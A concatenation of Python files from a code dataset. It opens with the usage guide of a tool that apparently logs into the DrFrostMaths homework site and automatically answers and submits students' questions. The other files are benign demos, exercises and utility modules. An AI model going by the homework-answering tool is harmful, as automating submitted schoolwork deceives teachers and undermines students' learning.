                       "Note: you can also use the tool for practice questions as well\n" \
                       "step3 - When you start the questions you will be given a URL that looks something like this:\n" \
                       "http://www.drfrostmaths.com/homework/do-question.php?aaid=590397\n" \
                       "OR like this:\n" \
                       "http://www.drfrostmaths.com/homework/do-question.php?aaid=590399&qnum=4\n" \
                       "Note: It does not make a difference if you are in the middle of a set of questions or at the " \
                       "start, the program will answer the remaining questions\n" \
                       "step4 - Copy the URL and paste it into the tool, then press enter\n" \
                       "step5 - The tool will then answer all remaining questions\n" \
                       "Note: If completing practice questions the tool will submit answers indefinitely\n" \
                       "Note: Rarely the tool may come across an unknown answer type which it is unable to handle. " \
                       "The tool will print this answer to the screen and you will need to input it manually"
choice = input('Do you wish to read the guide on how to use the tool? (y/n): ')
if choice == 'y':
print(print_string)
if __name__ == "__main__":
root = Tk()
root.protocol('WM_DELETE_WINDOW', sys.exit)
root.geometry('300x80')
root.title('DFM Login Screen')
lf = LoginFrame(root)
# wait for login to be retrieved
root.mainloop()
| 5,541 |
examples/Python/shapedetail.py
|
var414n/ubigraph_server
| 4 |
2170857
|
import xmlrpclib
# Create an object to represent our server.
server_url = 'http://127.0.0.1:20738/RPC2';
server = xmlrpclib.Server(server_url);
G = server.ubigraph
G.clear()
x = G.new_vertex()
y = G.new_vertex()
z = G.new_vertex()
G.new_edge(x,y)
G.new_edge(y,z)
G.set_vertex_attribute(x, "shape", "sphere");
G.set_vertex_attribute(x, "shapedetail", "40");
G.set_vertex_attribute(x, "label", "shapedetail=40");
G.set_vertex_attribute(y, "shape", "sphere");
G.set_vertex_attribute(y, "shapedetail", "10");
G.set_vertex_attribute(y, "label", "shapedetail=10");
G.set_vertex_attribute(z, "shape", "sphere");
G.set_vertex_attribute(z, "shapedetail", "5");
G.set_vertex_attribute(z, "label", "shapedetail=5");
| 709 |
Projects/Online Workouts/w3resource/String/program-75.py
|
ivenpoker/Python-Projects
| 1 |
2170757
|
#!/usr/bin/env python3
############################################################################################
# #
# Program purpose: Find the smallest window that contains all characters of a given #
# string. #
# Program Author : <NAME> <<EMAIL>> #
# Creation Date : November 5, 2019 #
# #
############################################################################################
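# Illustrative example (added; not part of the original header):
#   for the string "aabcbcdbca", the distinct characters are {a, b, c, d} and the
#   smallest window containing all of them is "dbca", so find_sub_string returns "dbca".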
from collections import defaultdict
def obtain_user_data(input_mess: str) -> str:
is_valid, user_data = False, ''
while is_valid is False:
try:
user_data = input(input_mess)
if len(user_data) == 0:
raise ValueError('Oops! Data needed')
is_valid = True
except ValueError as ve:
print(f'[ERROR]: {ve}')
return user_data
def find_sub_string(some_str: str) -> str:
str_len = len(some_str)
# Count all distinct characters
    dist_count_char = len(set(some_str))
ctr, start_pos, start_pos_index, min_len = 0, 0, -1, 9999999999
curr_count = defaultdict(lambda: 0)
for i in range(str_len):
curr_count[some_str[i]] += 1
if curr_count[some_str[i]] == 1:
ctr += 1
if ctr == dist_count_char:
            while curr_count[some_str[start_pos]] > 1:  # shrink the window from the left while the leading char is duplicated
                curr_count[some_str[start_pos]] -= 1
                start_pos += 1
len_window = i - start_pos + 1
if min_len > len_window:
min_len = len_window
start_pos_index = start_pos
return some_str[start_pos_index: start_pos_index + min_len]
if __name__ == "__main__":
main_data = obtain_user_data(input_mess='Enter some string data: ')
print(f'Smallest window that contains all characters of the said string: {find_sub_string(some_str=main_data)}')
| 2,239 |
scripts/split-dataset.py
|
vr100/rl-trading
| 0 |
2170544
|
import argparse, os
from utils import dataset
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"--data_path", type=str, help="specifies the train csv data file path",
required=True)
parser.add_argument(
"--output_path", type=str, help="specifies the output folder path",
required=True)
parser.add_argument(
"--time_sensitive", default=False,
type=lambda s: s.lower() in ['true', 'yes', '1'],
help="specifies whether the test data should be after train data")
return vars(parser.parse_args())
def main():
args = parse_args()
print("Args: {}".format(args))
data_path = os.path.abspath(args["data_path"])
output_path = os.path.abspath(args["output_path"])
time_sensitive = args["time_sensitive"]
dataset.split_data(data_path, output_path, time_sensitive)
main()
| 812 |
logs_pack/logs.py
|
Saldenisov/QY_itegrating_sphere
| 0 |
2169048
|
import logging
import os.path
def initialize_logger(output_dir, name=None):
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
# create console handler and set level to info
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
# create error file handler and set level to error
handler = logging.FileHandler(os.path.join(
        output_dir, "error.log"), "w", encoding=None, delay=True)
handler.setLevel(logging.ERROR)
formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
# create debug file handler and set level to debug
handler = logging.FileHandler(os.path.join(output_dir, "all.log"), "w")
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
| 1,167 |
program.py
|
PiggyAwesome/Collatz-Conjecture
| 3 |
2170837
|
import time
import webbrowser
i = int(input("Input number: "))
typee = "bar"
resulty = []
result = i  # start the sequence from the input value
while result != 1:
if (result % 2) != 0:
result = (result * 3) + 1
else:
result = result / 2
print(int(result))
resulty.append(result)
r = []
for i in range(len(resulty)):
r.append('%20')
webbrowser.open("https://quickchart.io/chart?title=3N%2B1&c={type:" + f'"{typee}"' + ",data:{labels:" + f"{r}" +" , datasets:[{label:'3N%2B1',data:" + f"{resulty}" + "}]}}") # Also makes a nice chart.
| 535 |
Problems/6. Procedures and Functions/5.Output_hello_and_world.py
|
wilpola/Introduction-to-programming_Python3
| 0 |
2170748
|
# @author: <NAME>
# @date: 2021-10-29
# Score: 10/10 2nd try
import random
def print_hello():
print("Hello")
def print_world():
print("World")
for i in range(0,10):
if random.randint(0,1) == 0:
print_hello()
else:
print_world()
# saying that there needs to be a new line char is misleading
| 315 |
zemberek/tokenization/span.py
|
Loodos/zemberek-python
| 52 |
2170880
|
class Span:
r"""
A class that represents specified chunks of a string. It is used to divide
TurkishSentenceExtractor input paragraphs into smaller pieces from which the
features will be extracted.
"""
def __init__(self, start: int, end: int):
if start >= 0 and end >= 0:
if end < start:
raise Exception("Span end value can not be smaller than start value")
else:
self.start = start
self.end = end
else:
raise Exception("Span start and end values can not be negative")
def get_length(self) -> int:
return self.end - self.start
def middle_value(self) -> int:
        # NOTE (original warning kept): this is not the true midpoint, which would be
        # self.start + (self.end - self.start) // 2; check the callers before changing it
return self.end + (self.end - self.start) // 2
def get_sub_string(self, string: str) -> str:
return string[self.start:self.end]
def in_span(self, i: int) -> bool:
return self.start <= i < self.end
def copy(self, offset: int) -> 'Span':
return Span(offset + self.start, offset + self.end)
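# Usage sketch (added for illustration; not part of the original module):
#   s = Span(3, 8)
#   s.get_length()                    -> 5
#   s.get_sub_string("hello world")   -> "lo wo"
#   s.in_span(7)                      -> True
#   s.copy(10)                        -> Span(13, 18)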
| 1,094 |
lib/piservices/remote/base.py
|
creative-workflow/pi-setup
| 1 |
2170560
|
from StringIO import StringIO
import color
class AbstractRemoteLoader:
def __init__(self, service, remote_file = None):
self.service = service
self.remote_file = remote_file
self.content = ''
self.fd = None
def load(self, remote_file = None):
if remote_file:
self.remote_file = remote_file
try:
with self.service.api.hide('output','running'):
self.service.run('sudo mkdir -p $(dirname %(f)s) && sudo touch %(f)s' % {'f': self.remote_file})
self.content = self.service.run('sudo cat %s' % self.remote_file)
except:
            pass  # not a problem: the file doesn't exist yet and will be created
self.fd = StringIO(self.content)
self.fd.seek(0)
def prepare_content_for_write(self):
pass
def write(self, remote_file=None, content=None, resulting_user='root', resulting_group='root'):
if not remote_file:
remote_file = self.remote_file
if not remote_file:
remote_file = ''
if content:
self.content = content
self.backup_if_no_backup_exists(remote_file)
self.prepare_content_for_write()
with color.for_put():
print "\n>> writing config: "+remote_file+"\n"+('='*30)+"\n"+self.content+"\n\n"
fd = StringIO(self.content)
fd.seek(0)
fd.write(self.content+'\n')
fd.seek(0)
self.service.run('sudo mkdir -p $(dirname %(f)s) && sudo touch %(f)s && sudo truncate -s 0 %(f)s' % {'f': remote_file})
self.service.put(fd, remote_file, use_sudo=True)
self.service.sudo('chown %s:%s %s' % (resulting_user, resulting_group, remote_file))
def backup_if_no_backup_exists(self, remote_file):
i = remote_file
o = '%s.pisetup.bak' % i
if self.service.file_exists(i) and not self.service.file_exists(o):
self.service.cp(i, o)
| 1,781 |
old/dccdc/loss.py
|
DotStarMoney/NBD
| 1 |
2170375
|
"""Loss/constraint functions."""
import tensorflow as tf
def affinity_log_loss(y_true_affinity, y_pred_affinity_logits, weights):
log_loss = tf.nn.sigmoid_cross_entropy_with_logits(y_true_affinity,
y_pred_affinity_logits)
avg_position_log_loss = tf.reduce_mean(log_loss, axis=-1)
example_loss = tf.reduce_sum(weights * avg_position_log_loss, axis=-1)
return tf.reduce_mean(example_loss)
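# Shape sketch (added; the exact shapes are an assumption based on the reductions above):
#   y_true_affinity / y_pred_affinity_logits: [batch, positions, channels]
#   weights:                                  [batch, positions]
# The log loss is averaged over channels, weighted and summed over positions,
# then averaged over the batch.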
| 451 |
dj-scm/cpx_sandbox.py
|
drpjm/gettin-crafty
| 0 |
2170202
|
import time
from adafruit_circuitplayground.express import cpx
import simpleio
cpx.pixels.brightness = 0.2
while True:
if cpx.switch:
print("Slide switch off.")
cpx.pixels.fill((10,10,10))
if cpx.button_a:
cpx.play_tone(262,1)
if cpx.button_b:
cpx.play_tone(294,1)
print("light level = ", cpx.light)
continue
else:
R = 0
G = 0
B = 0
x,y,z = cpx.acceleration
print((int(x),int(y),int(z)))
if x:
R = R + abs(int(x))
if y:
G = G + abs(int(y))
if z:
B = B + abs(int(z))
cpx.pixels.fill((R,G,B))
time.sleep(0.1)
| 708 |
utils_cv/tracking/opts.py
|
muminkoykiran/computervision-recipes
| 7,899 |
2169058
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import argparse
import os
import os.path as osp
class opts(object):
"""
Defines options for experiment settings, system settings, logging, model params,
input config, training config, testing config, and tracking params.
"""
def __init__(
self,
load_model: str = "",
gpus=[0, 1],
save_all: bool = False,
arch: str = "dla_34",
head_conv: int = -1,
input_h: int = -1,
input_w: int = -1,
lr: float = 1e-4,
lr_step=[20, 27],
num_epochs: int = 30,
num_iters: int = -1,
val_intervals: int = 5,
conf_thres: float = 0.6,
det_thres: float = 0.3,
nms_thres: float = 0.4,
track_buffer: int = 30,
min_box_area: float = 200,
reid_dim: int = 512,
root_dir: str = os.getcwd(),
) -> None:
# Set defaults for parameters which are less important
self.task = "mot"
self.dataset = "jde"
self.resume = False
self.exp_id = "default"
self.test = False
self.num_workers = 8
self.not_cuda_benchmark = False
self.seed = 317
self.print_iter = 0
self.hide_data_time = False
self.metric = "loss"
self.vis_thresh = 0.5
self.pad = 31
self.num_stacks = 1
self.down_ratio = 4
self.input_res = -1
        self.num_iters = -1  # note: this overrides the num_iters constructor argument, which is otherwise unused
self.trainval = False
self.K = 128
self.not_prefetch_test = True
self.keep_res = False
self.fix_res = not self.keep_res
self.test_mot16 = False
self.val_mot15 = False
self.test_mot15 = False
self.val_mot16 = False
self.val_mot17 = False
self.val_mot20 = False
self.test_mot20 = False
self.input_video = ""
self.output_format = "video"
self.output_root = ""
self.data_cfg = ""
self.data_dir = ""
self.mse_loss = False
self.hm_gauss = 8
self.reg_loss = "l1"
self.hm_weight = 1
self.off_weight = 1
self.wh_weight = 0.1
self.id_loss = "ce"
self.id_weight = 1
self.norm_wh = False
self.dense_wh = False
self.cat_spec_wh = False
self.not_reg_offset = False
self.reg_offset = not self.not_reg_offset
# Set/overwrite defaults for parameters which are more important
self.load_model = load_model
self.gpus = gpus
self.save_all = save_all
self.arch = arch
self.set_head_conv(head_conv)
self.input_h = input_h
self.input_w = input_w
self.lr = lr
self.lr_step = lr_step
self.num_epochs = num_epochs
self.val_intervals = val_intervals
self.conf_thres = conf_thres
self.det_thres = det_thres
self.nms_thres = nms_thres
self.track_buffer = track_buffer
self.min_box_area = min_box_area
self.reid_dim = reid_dim
# init
self._init_root_dir(root_dir)
self._init_batch_sizes(batch_size=12, master_batch_size=-1)
self._init_dataset_info()
def _init_root_dir(self, value):
self.root_dir = value
self.exp_dir = osp.join(self.root_dir, "exp", self.task)
self.save_dir = osp.join(self.exp_dir, self.exp_id)
self.debug_dir = osp.join(self.save_dir, "debug")
def _init_batch_sizes(self, batch_size, master_batch_size) -> None:
self.batch_size = batch_size
self.master_batch_size = (
master_batch_size
if master_batch_size != -1
else self.batch_size // len(self.gpus)
)
rest_batch_size = self.batch_size - self.master_batch_size
self.chunk_sizes = [self.master_batch_size]
for i in range(len(self.gpus) - 1):
chunk = rest_batch_size // (len(self.gpus) - 1)
if i < rest_batch_size % (len(self.gpus) - 1):
chunk += 1
self.chunk_sizes.append(chunk)
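        # Example (added): with batch_size=12 and gpus=[0, 1] the master GPU gets 6 and
        # chunk_sizes becomes [6, 6]; any remainder is spread over the first non-master GPUs.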
def _init_dataset_info(self) -> None:
default_dataset_info = {
"mot": {
"default_resolution": [608, 1088],
"num_classes": 1,
"mean": [0.408, 0.447, 0.470],
"std": [0.289, 0.274, 0.278],
"dataset": "jde",
"nID": 14455,
}
}
class Struct:
def __init__(self, entries):
for k, v in entries.items():
self.__setattr__(k, v)
dataset = Struct(default_dataset_info[self.task])
self.dataset = dataset.dataset
self.update_dataset_info_and_set_heads(dataset)
def update_dataset_res(self, input_h, input_w) -> None:
self.input_h = input_h
self.input_w = input_w
self.output_h = self.input_h // self.down_ratio
self.output_w = self.input_w // self.down_ratio
self.input_res = max(self.input_h, self.input_w)
self.output_res = max(self.output_h, self.output_w)
def update_dataset_info_and_set_heads(self, dataset) -> None:
input_h, input_w = dataset.default_resolution
self.mean, self.std = dataset.mean, dataset.std
self.num_classes = dataset.num_classes
# input_h(w): input_h overrides input_res overrides dataset default
input_h = self.input_res if self.input_res > 0 else input_h
input_w = self.input_res if self.input_res > 0 else input_w
self.input_h = self.input_h if self.input_h > 0 else input_h
self.input_w = self.input_w if self.input_w > 0 else input_w
self.output_h = self.input_h // self.down_ratio
self.output_w = self.input_w // self.down_ratio
self.input_res = max(self.input_h, self.input_w)
self.output_res = max(self.output_h, self.output_w)
if self.task == "mot":
self.heads = {
"hm": self.num_classes,
"wh": 2 if not self.cat_spec_wh else 2 * self.num_classes,
"id": self.reid_dim,
}
if self.reg_offset:
self.heads.update({"reg": 2})
self.nID = dataset.nID
self.img_size = (self.input_w, self.input_h)
else:
assert 0, "task not defined"
def set_gpus(self, value):
gpus_list = [int(gpu) for gpu in value.split(",")]
self.gpus = (
[i for i in range(len(gpus_list))] if gpus_list[0] >= 0 else [-1]
)
self.gpus_str = value
def set_head_conv(self, value):
h = value if value != -1 else 256
self.head_conv = h
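# Usage sketch (added for illustration; the argument values are placeholders, not recommendations):
#   opt = opts(load_model="", gpus=[0], num_epochs=30)
#   opt.update_dataset_res(608, 1088)   # recompute output sizes for a new input resolution
#   print(opt.heads, opt.chunk_sizes)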
| 6,769 |